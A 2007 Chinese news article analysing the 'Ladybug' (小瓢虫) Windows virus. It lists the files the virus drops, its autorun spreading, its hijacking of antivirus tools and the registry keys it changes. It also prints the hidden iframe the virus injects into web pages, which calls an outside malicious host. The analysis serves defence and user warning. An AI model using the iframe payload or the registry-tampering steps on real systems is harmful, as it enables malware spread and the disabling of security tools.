赛迪网 > IT技术 网络安全 > 最新更新
  IT资讯搜索
 
IT产品搜索
[程序开发][网管世界][网络安全][数据库技术]
[操作系统][嘉宾聊天·在线访谈][活动集锦]
[精彩专题][Symantec专区][订阅IT技术周刊]
[开发论坛][网管论坛][安全论坛][数据库论坛]
[操作系统论坛][Sybase专区][IBM dW技术专区]
[病毒求助][病毒与漏洞播报][文档·源码下载]

专家解析“小瓢虫”病毒 危害可比熊猫烧香

发布时间:2007.12.19 06:30     来源:赛迪网    作者:李铁军

这个病毒看起来象熊猫烧香和AV终结者的结合体,阳光以前曾给过一个详细的分析。如果这个病毒把感染做的完美些(现在病毒还不是真正意义上的感染,是用病毒体完全覆盖正常EXE),会不会造成和李俊版熊猫烧香一样的效果呢,完全有可能。

以下是关于该病毒的详细分析报告:

一、病毒信息

病毒名:Win32.Troj.Serwer.yx

病毒中文名称:小瓢虫

二、病毒行为

这是一个感染型病毒,把会计算机上的系统时间改为 2030 年,在系统盘的system32文件夹下释放多个病毒文件。

在计算机上的每个盘下生成SDGames.exe和Autorun.inf两个文件,以达到通过双击该盘时病毒可以运行起来。

在每个盘下生成三个Url文件,都指向该盘下的SDGame.exe文件,三个Url文件具有迷惑性的图标。可以查看这三个URL的属性,会发现都指向c:\sdgame.exe。

通过添加注册表启动项以达到开机时病毒能运行起来,通过修改注册表破坏系统安全模式,禁用大部分系统功能,包括:禁用任务管理器、禁用控制面板、禁止修改系统配置、锁定主页、禁用注册表编辑器等。

映像劫持了大量软件,被劫持的软件包括“杀毒软件”、“系统检测工具”、“QQ”。(连QQ都不让用,这病毒够BT)

感染计算机上的 exe 文件,感染方式为覆盖数据。(除系统盘外,其它盘的EXE都被替换为小瓢虫图标)

感染计算机上的 hta、html、htm、jsp、php、asp 后缀的文件,插入网页代码。 (除系统盘外,这一点和熊猫烧香的传播方式相同,有可能会造成网站大面积挂马)

把计算机上的所有盘设为所有人完全共享。(这是尼姆达病毒最常用的手段,当然,目的就是在局域网中大面积传播了)

病毒运行后释放以下文件:

%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF

Taskeep.vbs 的作用是运行起病毒进程;

netshare.cmd 的作用是打开本机的共享;

Avpser.cmd 用于结束计算机上的大量杀毒软件、安全检测软件,常见杀毒软件都在被攻击之列。

病毒在计算机上的每个盘下生成SDGame.exe和Autorun.inf,并生成 Recycleds.url、Windows.url,新建文件夹.url三个文件,诱使用户双击。这三个文件都指向该盘下的SDGame.exe文件。(Recycleds.url 的图标为“回收站”,其余两个图标为“文件夹图标”)

病毒创建注册表启动项,添加服务;

把计算机上为以下后缀名的文件插入代码:(除系统盘外)

".hta"
".html"
".htm"
".php"
".asp"
".jsp"

插入的代码:

iframe id="iframe" width="0" height="0" scrolling="no" 
frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe" align="center" border="0"

感染计算机上的 exe 文件,感染方式为覆盖数据。(除系统盘,被感染后的 exe 文件图标为绿色的小飘虫)

修改计算机上的 reg 和 txt 文件关联指向“%systemroot%\system32\SDGames.exe”。

把计算机上的系统时间改为 2030 年,中国木马制作者的惯用手法。

通过修改注册表的方式破坏安全模式。

禁用cmd:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD

破坏显示隐藏文件:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL\CheckedValue

使得文件扩展名无法显示:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt

隐藏控制面板:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

禁用注册表编辑器:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools

禁用任务管理器:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

修改IE主页为:

http:/ /www.zhidaobaidu.10mb.cn

隐藏文件夹选项:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

映像劫持常用安全软件,这次连杀毒软件的命令行查毒都没放过。

【相关文章】

警惕尚未成熟的恶性病毒SDGames.exe小瓢虫

(责任编辑:李磊)


[ 发表评论 ] 字体[  ] [ 打印 ] [ 进入博客 ] [ 进入论坛 ]  [ 推荐给朋友 ]
  相关文章
· 本周病毒预警:蠕虫新变种删除视频文件 (12-18) · 手机莫名狂发彩信 50元话费该由谁来付? (12-18)
· 防御机器狗病毒(EDog)清除解决方案 (12-18) · 还原卡遭遇机器狗攻击 (12-18)
· 新闻调查:"熊猫烧香"案侦破始末(图) (12-18) · U盘病毒卷土重来 化身“方块Q”趁机作案 (12-17)
· 蠕虫新变种感染HTML格式文件 删除色情视频 (12-17) · 网游病毒数量暴增 占感染病毒总数近八成 (12-17)
· 揭密网络黑色产业链 病毒催生全民黑客时代 (12-17) · 蠕虫新变种"狙击"视频 通过网络、U盘传播 (12-17)
  客户需求反馈表
* 姓  名:
更多资料  了解方案  认识厂商
* 单位名称:
* 联系电话:
* 电子邮件:
  赛迪推荐  
  手机·资费 ·新品·导购·评测·手机资费·宽带
手机搜索  诺基亚 N73 MOTO Z6
  IT产品 ·笔记本·台式机·服务器·打印·投影
IT产品搜索 
  IT技术 ·开发·网管·安全·数据库·操作系统
  信息化 ·热点·专题·访谈·周刊·方案案例
· 工信部“三定”公布 总编制731名设24司局
· 北京发电子商务监管意见 营利性网店须办照
· 直播 08中国城市信息化高峰论坛 案例点评
· 烽火网络校园解决方案 移民安置信息管理系统
  IT博客 ·曾剑秋·项立刚·Java学习·网管
  IT技术论坛 ·开发·网管·安全·数据库·系统